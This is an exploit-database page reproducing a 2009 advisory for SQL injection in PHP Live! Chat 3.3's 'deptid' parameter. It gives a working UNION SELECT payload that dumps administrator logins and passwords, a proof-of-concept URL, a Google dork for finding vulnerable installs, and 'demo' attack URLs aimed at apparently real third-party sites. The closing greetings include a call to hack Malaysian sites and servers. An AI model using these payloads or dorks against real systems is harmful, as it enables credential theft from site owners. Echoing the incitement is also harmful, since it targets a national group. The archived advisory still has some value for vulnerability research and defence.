header-logo
Suggest Exploit
vendor:
PHP Live! Chat
by:
v3n0m
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Live! Chat
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:phplivesupport:phplive
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP Live! 3.3 (deptid) Remote SQL Injection

A remote SQL injection vulnerability exists in PHP Live! Chat v3.3. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'deptid' parameter of the 'message_box.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to the database and extraction of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL statements.
Source

Exploit-DB raw data:

*************************************************************************
,   .                                       |          |    o     |    
|   |,---.,---.,   .,---.,---.,---.,---.,---|,---.,---.|    .,---.|__/ 
`---'|   ||   ||   |,---||    ,---||    |   ||---'|    |    ||   ||  \ 
  |  `---'`---|`---|`---^`---'`---^`    `---'`---'`    `---'``   '`   `
  `       `---'`---'                                                   
*************************************************************************
[o] PHP Live! 3.3 (deptid) Remote SQL Injection

			--==[ Author ]==--
[+] Author	: v3n0m
[+] Contact	: v3n0m666[at]live[dot]com
[+] Blog	: http://0wnage.wordpress.com/
[+] Group	: YOGYACARDERLINK
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: September, 02-2009 [INDONESIA]
*************************************************************************
			--==[ Details ]==--
[+] Software	: PHP Live! Chat
[+] Version 	: v3.3
[+] Vendor 	: http://www.phplivesupport.com/
[+] Price	: $49.95
[+] Vulnerable	: Remote SQL Injection
[+] Google Dork	: "Powered by PHP Live! v3.3"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
    [xxx] = Valid x number

[-] Demo Live:
[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--


FYI: Think twice before you buy these vulnerable script for $49.95 ?

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks	=> str0ke & milw0rm
RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,LeQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
		=> & para gay yogyagaylink bruakakakakakakak
Others		=> g0par Santiago,Don Tukulesto,mixbrainwasher
		=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks	=> mywisdom [nice 0-day, you're 31337]
		=> yadoy666 [Mari kita ganyang malingsianjink]
		=> Angela Zhang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
  be carefull your culture art & song,island get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 11:20pm in my bedroom, preparing office goes on...!!

# milw0rm.com [2009-09-02]